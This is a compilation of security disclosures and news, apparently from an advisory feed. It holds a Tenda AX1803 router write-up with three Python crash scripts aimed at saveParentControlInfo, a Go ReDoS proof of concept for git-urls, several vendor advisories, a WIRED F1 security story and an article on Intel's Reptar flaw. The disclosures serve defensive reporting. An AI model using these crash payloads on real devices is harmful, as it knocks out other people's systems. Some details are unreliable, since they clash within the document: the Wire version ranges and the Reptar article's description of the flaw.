Tenda AX1803 v1.0.0.1 was discovered to contain a stack overflow via the time parameter in the function saveParentControlInfo . This vulnerability allows attackers to cause a Denial of Service (DoS) attack

**Vulnerability introduction**

Tenda AX1803 firmware version v1.0.0.1 has a stack overflow vulnerability because it uses the strcpy function by mistake in the deviceId、time and urls parameter of the saveParentControlInfo function which can cause a Denial of Service (DoS) attck.  
Firmware download address:https://down.tenda.com.cn/uploadfile/AX1803/AX1803V2.0\_V1.0.0.1\_cn.zip

**Vulnerability analysis****deviceId parameter in the function saveParentControlInfo**

In the binary file /bin/tdhttpd, we use IDA to locate the function saveParentControlInfo that causes the vulnerability.  

As you can see, the strcpy function is called on line 28 of the saveParentControlInfo function. Let’s trace the source of the two parameters of the strcpy function.  

We found that parameter v2 was generated when the sub\_295C8 function processed the deviceId parameter, and v5 was malloced on the heap.  
As we all know, strcpy does not check the length of the parameter. If the deviceId is assigned a long string such as b"a"\*0x400, it will cause a heap overflow in saveParentControlInfo, causing the entire program to crash and achieve the effect of a denial of service attack (Dos)  
exp:

    import requests
     
    def deviceId():
          data = {
              b"deviceId":b"A"*0x400,
              b"deviceName": b'a',
              b"time": b'a',
              b"enable":b'1',
              b'url_enable':b'1',
              b'urls':b'a',
              b'day':b'1',
              b'block':b'0',
              b'limit_type':b'1'
          }
          res = requests.post("http://192.168.44.128/goform/saveParentControlInfo", data=data)
          print(res.content)
    
    
    deviceId()

**time parameter in the function saveParentControlInfo**

In line 34 of the saveParentControlInfo function, the sub\_60CFC function is called, and this function calls sub\_295C8 to obtain the time field.  

However, after obtaining the time parameter, the obtained time is simply assigned to v4, and strcpy is directly called to pass it to the variable (a2+34) on the stack, without any verification in the middle. it will cause a stack overflow We assign the time field to b'a'\*0x400 as before,which caused the program to crash.  

exp:

    import requests
     
    def time():
          data = {
              b"deviceId":b"A",
              b"deviceName": b'a',
              b"time": b'a'*0x400,
              b"enable":b'1',
              b'url_enable':b'1',
              b'urls':b'a',
              b'day':b'1',
              b'block':b'0',
              b'limit_type':b'1'
          }
          res = requests.post("http://192.168.44.128/goform/saveParentControlInfo", data=data)
          print(res.content)
    
    
    time()

**urls parameter in the function saveParentControlInfo**

In line 34 of the saveParentControlInfo function, the sub\_60CFC function is called, and this function calls sub\_295C8 to obtain the time field.  

Like the previous deviceId field, the program simply took out the urls without checking the length. Therefore, when the program passed time to (a2 + 80) through strcpy, a heap overflow occurred.  
exp:

    import requests
     
    def urls():
          data = {
              b"deviceId":b"A",
              b"deviceName": b'a',
              b"time": b'a',
              b"enable":b'1',
              b'url_enable':b'1',
              b'urls':b'a'*0x400,
              b'day':b'1',
              b'block':b'0',
              b'limit_type':b'1'
          }
          res = requests.post("http://192.168.44.128/goform/saveParentControlInfo", data=data)
          print(res.content)
    
    
    urls()

**environment**

Create a new net bridge

    sudo apt install uml-utilities bridge-utils
     sudo brctl addbr br0
     sudo brctl addif br0 ens33
     sudo ifconfig br0 up
     sudo dhclient br0

Install libc for arm environment and copy qemu-arm-static to the firmware root folder

    sudo apt install qemu-user-static libc6-arm* libc6-dev-arm*
    cp $(which qemu-arm-static) .
    sudo chroot ./ ./qemu-arm-static  ./bin/tdhttpd

use  
sudo qemu-arm-static -L ../ ./tdhttpd  
to simulates running firmware

Now we can access http://192.168.44.128/main.html to enter the virtual router for testing

CVE-2023-48111: Tenda AX1803 was discovered  A series of fatal vulnerabilities that can cause a Denial of Service (DoS)

wire-avs provides Audio, Visual, and Signaling (AVS) functionality sure the secure messaging software Wire. Prior to versions 9.2.22 and 9.3.5, a remote format string vulnerability could potentially allow an attacker to cause a denial of service or possibly execute arbitrary code. The issue has been fixed in wire-avs 9.2.22 & 9.3.5 and is already included on all Wire products. No known workarounds are available.

**Affected versions**

<=9.2.22, <=9.3.5

**Patched versions**

9.2.22, 9.3.5

**Description**

**Impact**

A remote format string vulnerability could potentially allow an attacker to cause a denial of service or possibly execute arbitrary code.

**Patches**

*   The issue has been fixed in wire-avs 9.2.22 & 9.3.5 and is already included on all Wire products.

**Workarounds**

*   No workaround known

**References**

*   Fixed in commit 364c332

**For more information**

If you have any questions or comments about this advisory feel free to email us at vulnerability-report@wire.com

CVE-2023-48221: Remote format string vulnerability

Debian Linux Security Advisory 5559-1 - A vulnerability was discovered in the SSH dissector of Wireshark, a network protocol analyzer, which could result in denial of service or potentially the execution of arbitrary code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5559-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffNovember 19, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : wiresharkCVE ID         : CVE-2023-6174 CVE-2023-6175A vulnerability was discovered in the SSH dissector of Wireshark, anetwork protocol analyzer, which could result in denial of service orpotentially the execution of arbitrary code.For the stable distribution (bookworm), these problems have been fixed inversion 4.0.11-1~deb12u1.We recommend that you upgrade your wireshark packages.For the detailed security status of wireshark please refer toits security tracker page at:https://security-tracker.debian.org/tracker/wiresharkFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmVaYm8ACgkQEMKTtsN8Tjbp5A//TSNrnxYrdW4XklOocknIwdtDtzt3AcXA6MLRlWmXnR9I3JWAnfWG84ezlXM/p3kLRN2bzfYVqhL2MpCNQzDyrTpx+0GWSImkPy520WlIrC64GHOqffIffDeF+28bQfdhbI13Kcfc9F7/PLIA9VvzqoFPHlCVdJhxvaCCJHBN2HefNC4fnEKlpU+ZI/68nzvzZsJG5K3tcdUp9BDYr8eRqmfWwuIteTBqfZ13ohvU8lYK6TNZah+NiGoSUmLGtf/5QMXeytiIVDkul5+b206ckvotm2EZQXtZntjZijPbLI1Fh8rPAuVDEbmBQOwYYc7OKlNDKl3GM2bnMXbJaNDBJ2YJk2hO5OfTankrnY54LX7R3D0WBhsDRb7X4tx9shgWOm23aigUj0ebR5jVmaDMYAOMEr5U9juPa8LBRu9gQWRbuuwADTcjsGQiYhjqKoGrCErSInuQUyNSgmyBQgeA4uQipSLpQozt42u2CfBJb5te+sI/USF9xK6xusF5BZK+5leinGLQyDd/wMn8gx/UzbDcvjuT3XMek+1fJjVfzLehorwt+Ck4yXc9edKRFS86ZRVSchFVmZUFREGszNQAwWUbtlXfeLBIF8yNqp7E9qTMyjBpCplk/Vnb3va6wJhMCYTUAgBYVjQ2P6tCPyQJHB8HrXgexcBluGBuu1q2b4M==sLQ/-----END PGP SIGNATURE-----

Debian Security Advisory 5559-1

Debian Linux Security Advisory 5558-1 - Two security vulnerabilities have been discovered in Netty, a Java NIO client/server socket framework.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5558-1                   security@debian.org  
https://www.debian.org/security/                          Markus Koschany  
November 18, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : netty  
CVE ID         : CVE-2023-34462 CVE-2023-44487  
Debian Bug     : 1038947 1054234

Two security vulnerabilities have been discovered in Netty, a Java NIO  
client/server socket framework.

CVE-2023-34462

    It might be possible for a remote peer to send a client hello packet during  
    a TLS handshake which lead the server to buffer up to 16 MB of data per  
    connection. This could lead to a OutOfMemoryError and so result in a denial  
    of service.

CVE-2023-44487

    The HTTP/2 protocol allowed a denial of service (server resource  
    consumption) because request cancellation can reset many streams quickly.  
    This problem is also known as Rapid Reset Attack.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 1:4.1.48-4+deb11u2.

For the stable distribution (bookworm), these problems have been fixed in  
version 1:4.1.48-7+deb12u1.

We recommend that you upgrade your netty packages.

For the detailed security status of netty please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/netty

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmVY5TZfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD  
RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7  
UeRHiBAAzFhW85Ho37J02wrSDVwhIMTsVjNO9lnA08Pswdohr9K1wxeCJ/hBAx97  
UNIrjTxyOfCJWi1Kj5pITXEHBRu6w1fj/5y9yoMpAKEu+oGQroHbSf4CPmqP2Of0  
eamkfbGx2Dh7Ug3qYxe+elcqRtU3gu8I8DYcWJnm2VpWq7/pbNJ+9iqtmMjhkPLH  
1etLI/5HAkwpPimZSrHzcimn39gEVaIbZLc86ZBAoAPghc+iJR1JFHERmkEutWkB  
eAnL3kD1mr6F711eZvDfPaRfEUVorW67ZEpPX68MJExuYHNXd268EhQOhf/ZYv8g  
SUSBJuKw4w2OnL4fn8lhqnQgYHUVkcYBtfYii6E9bEVAIPoaT+4gvdSg9zkF6cza  
Da8SXkEY2ysaX+A24iVnCNMpCMSOUOxWsFFvkCcfi8A4HxGGqWzVOsBbDJKjktS1  
g6FyeqWsGh9QG/CPYeMN7LB7lW1l2XzO6GQ9QR1rzU/whgUVxprkye5wx2BaQmom  
rrWVHBijH1cNWd1IbryAm+prduL1l/CNR0785ZPTjB3SsMFPCAtRHf9G976rqVs0  
P3jGg+BdeDj+sd3EFHcHnNXQOaETgR07RWzngbjEkgmJYhB2B43hCQ2LwsNlHsmg  
O6otUI2k274IF9KHh0T1h1hopbUTU8VPy3dpcLloCzk7KiAv1RI=  
=4ExT  
-----END PGP SIGNATURE-----

Debian Security Advisory 5558-1

Red Hat Security Advisory 2023-7345-01 - An update is now available for Red Hat OpenShift GitOps 1.9. Issues addressed include a denial of service vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7345.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Red Hat OpenShift GitOps v1.9.3 security update  
Advisory ID:        RHSA-2023:7345-01  
Product:            Red Hat OpenShift GitOps  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:7345  
Issue date:         2023-11-20  
Revision:           01  
CVE Names:          CVE-2023-39325  
====================================================================

Summary: 

An update is now available for Red Hat OpenShift GitOps 1.9.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

An update is now available for Red Hat OpenShift GitOps 1.9.

Security Fix(es):

* golang: net/http, x/net/http2: rapid stream resets can cause excessive work (Rapid Reset Attack) (CVE-2023-39325)

* HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack) (CVE-2023-44487)

A Red Hat Security Bulletin which addresses further details about the Rapid Reset flaw is available in the References section.

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-39325

References:

https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-003  
https://docs.openshift.com/gitops/1.9/understanding_openshift_gitops/about-redhat-openshift-gitops.html  
https://bugzilla.redhat.com/show_bug.cgi?id=2242803  
https://bugzilla.redhat.com/show_bug.cgi?id=2243296

Red Hat Security Advisory 2023-7345-01

Red Hat Security Advisory 2023-7344-01 - An update for openshift-gitops-kam is now available for Red Hat OpenShift GitOps 1.9. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7344.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: openshift-gitops-kam security updateAdvisory ID:        RHSA-2023:7344-01Product:            Red Hat OpenShift GitOpsAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7344Issue date:         2023-11-20Revision:           01CVE Names:          CVE-2023-39325====================================================================Summary: An update for openshift-gitops-kam is now available for Red Hat OpenShift GitOps 1.9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:An update for openshift-gitops-kam is now available for Red Hat OpenShift GitOps 1.9.Security Fix(es):* golang: net/http, x/net/http2: rapid stream resets can cause excessive work (Rapid Reset Attack) (CVE-2023-39325)* HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack) (CVE-2023-44487)A Red Hat Security Bulletin which addresses further details about the Rapid Reset flaw is available in the References section.For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-39325References:https://access.redhat.com/security/updates/classification/#importanthttps://access.redhat.com/security/vulnerabilities/RHSB-2023-003https://bugzilla.redhat.com/show_bug.cgi?id=2242803https://bugzilla.redhat.com/show_bug.cgi?id=2243296

Red Hat Security Advisory 2023-7344-01

Beyond the blinding speeds and sharp turns on new terrain, the teams at this weekend’s big F1 race are preparing for another kind of danger.

Every Formula 1 race weekend is essentially a pop-up event in a different city around the world, bringing 10 teams, their cars, and their entire mobile infrastructure to Australia, Singapore, Monaco, and beyond. This weekend's Las Vegas Grand Prix is especially unscripted, though, because the event is Formula 1's debut in Sin City. Cold weather and a rogue drain cover on the track have already injected some chaos into the spectacle. But as they prepared for the event, cybersecurity specialists from McLaren Racing, the city of Las Vegas, and the security firm Darktrace told WIRED that they aren't deterred—their whole job is to expect the unexpected.

Major live sporting events are a prime target for hackers because they are prominent, highly visible, and draw international attention. Russia's notorious attempt to target the 2018 Winter Olympics in South Korea, for example, included both disruptive attacks and hacks for information gathering. All sports now incorporate advanced elements of digital analysis and quantified performance, but Formula 1 is a particularly data-heavy sport. Race cars are essentially giant sensor arrays that are hurtling around at more than 200 miles per hour, generating massive amounts of information. The quicker teams can crunch the numbers from the track, the sooner they can determine which strategies and modifications to employ in real time or in preparation for the final race of the weekend. But a denial of service attack on any of a team’s engineering systems, one that disrupts their real-time communications, or theft of intellectual property could be disastrous for an F1 team.

“We’re a very public sport,” says Ed Green, McLaren's head of commercial technology. “Our people are known and where we’re racing is known and what we do is known. And while there are lots of unknown things about our operation, lots of what we do is public so people can find out information and start to target us. So what we’re trying to do is make sure that security is part of the team and an additive part of what we do.”

Green describes McLaren's setup at each race as “an extension of the office for the weekend.” The infrastructure is a sort of mobile data center where, for example, the pit crew on the ground is working as a remote part of the garage back at headquarters. This means that a crucial component of the entire operation is reducing latency in the digital connection between the track and home base—a geographic and network distance that varies significantly from weekend to weekend as the season plays out around the world. Green says that during the Brazil race in Sao Paulo at the beginning of November, McLaren was connected to its HQ in England with just a 223-millisecond delay.

“We pull down 1.5 terabytes of data a weekend and run 50 million simulations over the course of a weekend. And I would break down the importance of cybersecurity in a few different buckets,” McLaren CEO Zak Brown says. “We have the design IP of our race car, and that is highly confidential trade secrets that we're moving around a lot. We're dealing with third parties and racing around the world. And then we have all the data that is going on at the race track, where we're literally making split-second decisions.”

Darktrace, which provides digital defense services for McLaren and has also worked with the city of Las Vegas on its cybersecurity for years, says that phishing, business email compromise, and other scams are the types of attacks its real-time, artificial-intelligence-based threat monitoring system detects and blocks most often related to Formula 1, both day to day and on race weekends.

“One of the things that I've learned from being a partner with McLaren is the car changes continuously, every race there are things that are changing, new elements being introduced based on the track conditions,” says Nicole Eagan, Darktrace's chief strategy and AI officer. “It's a continuous updating and changing of IP that's much more dynamic than in other industries that we protect.”

All of this change and quick communication both within an organization and with third parties creates potential opportunities for scammers. But McLaren's Brown also notes that Formula 1 teams need to be wary of their position on the global stage.

“It's one thing to lock down Fort Knox—we’re moving 24 times around the world into different countries, from China to Saudi Arabia to Las Vegas,” he says. “Each one has its own challenges. With the growth of the sport, how much technology we use and where we're racing, people will attempt to use our sport sometimes in a political nature. There are bad actors that can potentially come at us from every angle and for every reason, some of which aren't personal. So therefore cybersecurity is right at the top of the list when we go through our IT needs.”

While Darktrace chief information security officer Mike Beck agrees that geopolitics and hacktivism can pose a threat to a sport with as much global reach as F1, he adds that competitive racing's simple and straightforward goal is an advantage for defenders.

“The mission is so clear, get that car around the track as fast as possible and make sure no one steals your IP and you don’t get locked out,” he says. “When you get that sort of clarity on a mission you can articulate risk really, really well.”

While preparing for the Formula 1 race weekend has been a logistical challenge in many ways, Michael Sherwood, Las Vegas' chief innovation and technology officer, says that the city is well positioned to handle the cybersecurity component because it deals with so many high-profile events throughout the year. Las Vegas has also invested in smart city infrastructure and already defends a massive array of deployed sensors and other networked devices.

Recent cyberattacks that targeted some of Las Vegas' entertainment giants, including Caesar's and MGM Resorts, have put the city on even higher alert, Sherwood says. But he adds that whether he's working on digital defenses for the Grand Prix, New Year's Eve, or just a regular night of epic Vegas partying, “there’s no resting. This is the world we live in—you’re on guard all the time, preparing and prepping.”

Inside the Race to Secure the F1 Las Vegas Grand Prix

git-urls version 1.0.1 is vulnerable to ReDOS (Regular Expression Denial of Service) in Go package.

**Inefficient Regular Expression Complexity in git-urls**

Moderate severity GitHub Reviewed Published Nov 18, 2023 to the GitHub Advisory Database • Updated Nov 20, 2023

GHSA-3f2q-6294-fmq5: Inefficient Regular Expression Complexity in git-urls

\[NAME OF AFFECTED PRODUCT(S)\]

\- https://pkg.go.dev/github.com/whilp/git-urls v1.0.1

\[AFFECTED AND/OR FIXED VERSION(S)\]

\- v1.0.1

\- Status: not fixed

\[VULNERABILITY\]

\- Regex Denial of Service

\[DESCRIPTION\]

The regex on line 35. inside urls.go is vulnerable to regex denial of service when a long input is provided inside

directory path of the git url.

It is possible to cause a 7s delay but only because the payload in the url was to long. Here is the PoC:

var payload = strings.Repeat("////", 19000000) //payload used, the number can be tweaked to cause 7 second delay

malicious\_url := "6en6ar@-:0////" + payload + "\\"

begin := time.Now()

//u, err := giturls.ParseScp("remote\_username@10.10.0.2:/remote/directory")// normal git url

\_, err := giturls.ParseScp(malicious\_url)

if err != nil {

fmt.Errorf("\[ - \] Error ->" + err.Error())

}

//fmt.Println("\[ + \] Url --> " + u.Host)

elapse := time.Since(begin)

fmt.Printf("Function took %s", elapse)

This vulnerbale regex causes the application to take longer time in parsing the input.

CVE-2023-46402: Security issue in regex inside git-urls package

By Deeba Ahmed
Intel CPU Vulnerability Impacts Multi-Tenant Virtualized Environments.
This is a post from HackRead.com Read the original post: Google Reveals ‘Reptar’ Vulnerability Threatening Intel Processors

Google has discovered a new security vulnerability in Intel CPUs that could let attackers execute code on vulnerable systems. The vulnerability has been named “Reptar” by Google and affects numerous Intel CPUs, including those utilized in cloud computing environments.

****What is Reptar Vulnerability?****

Reptar is a side-channel vulnerability tracked as CVE-2023-23583. It allows attackers to leak information from a vulnerable system and use it to steal sensitive data such as credit card numbers, passwords, etc.

The vulnerability was discovered by Google’s Information Security Engineering team, which notified Intel and industry partners about the issue, and mitigations were rolled out before its public disclosure.

****How Was Reptar Discovered?****

According to Google’s blog post, a company’s security researcher discovered it in the way the CPU interprets redundant prefixes, and if successfully exploited, it allows attackers to bypass the CPU’s security boundaries.

For your information, prefixes allow users to change how instructions behave by disabling/enabling different features. Those prefixes that don’t make sense or conflict with other prefixes are called redundant prefixes. Such prefixes are generally ignored.

****How does Reptar work?****

Reptar works by exploiting an issue in the way speculative execution is handled by Intel CPUs. Speculative execution is a technique that allows CPUs to execute instructions before being fully validated. Although this technique is time-saving, it can make CPUs vulnerable to side-channel attacks.

The Reptar vulnerability is a serious risk to multi-tenant virtualized environments, where the exploit causes the host machine to crash on a guest machine, resulting in a denial of service to other guest machines connected to the same host. In addition, it could lead to privilege escalation or information disclosure.

In a multi-tenant virtualized environment, multiple tenants share the same physical hardware, so if one tenant is infected with Reptar, the attacker has access to the other tenants’ data through the same vulnerability.

Aubrey Perin, Lead Threat Intelligence Analyst at Qualys, a Foster City, Calif.-based provider of disruptive cloud-based IT, security and compliance solutions commented on the issue stating, “Unmitigated, this bug could be serious as an attacker could start testing to see if there is any order to the seemingly random outputs. As it stands, it sounds more like an oddity that could be used to take systems down.”

Mr Perin further explained that “Without reviewing the catalogue of patches, it’s hard to say that it’s atypical of the bugs usually found. In this case, where it can cause crashes, security teams should definitely prioritize the patch implementation to eliminate the risk of failure.”

“Researchers do find vulnerabilities all the time, often for bounty, and it benefits users when responsible disclosure practices are followed. Google is a very good practitioner of responsible disclosure, and you can often find references to the researcher or organization who disclosed the vulnerability in the notes associated with patches,” he added.

****Intel’s Response****

Intel has released an advisory to confirm the issue, explaining that the issue was discovered in some Intel processors caused by an error in the CPU’s handling of redundant prefixes. The company has released a patch for the issue. It was assigned a CVSS score of 8.8 and declared a High-security vulnerability.

This CPU vulnerability impacts several Intel desktop, mobile, and server CPUs., including 10th Generation Intel® Core™ Processor Family, 3rd Generation Intel® Xeon® Processor Scalable Family, Intel® Xeon® D Processor, and 11th Generation Intel® Core Processor Family, and CPUs used in cloud computing environments, etc.

The company is working on a long-term fix. In the meantime, it is advising users to patch their devices immediately.

****_RELATED ARTICLES_****

1.  **Intel Responds to ‘Downfall’ Attack with Firmware Updates**
2.  **Plundervolt: A new attack on Intel processors threatening SGX data**
3.  **High severity Intel chip flaw left cars, medical, IoT devices vulnerable**

Tag

#dos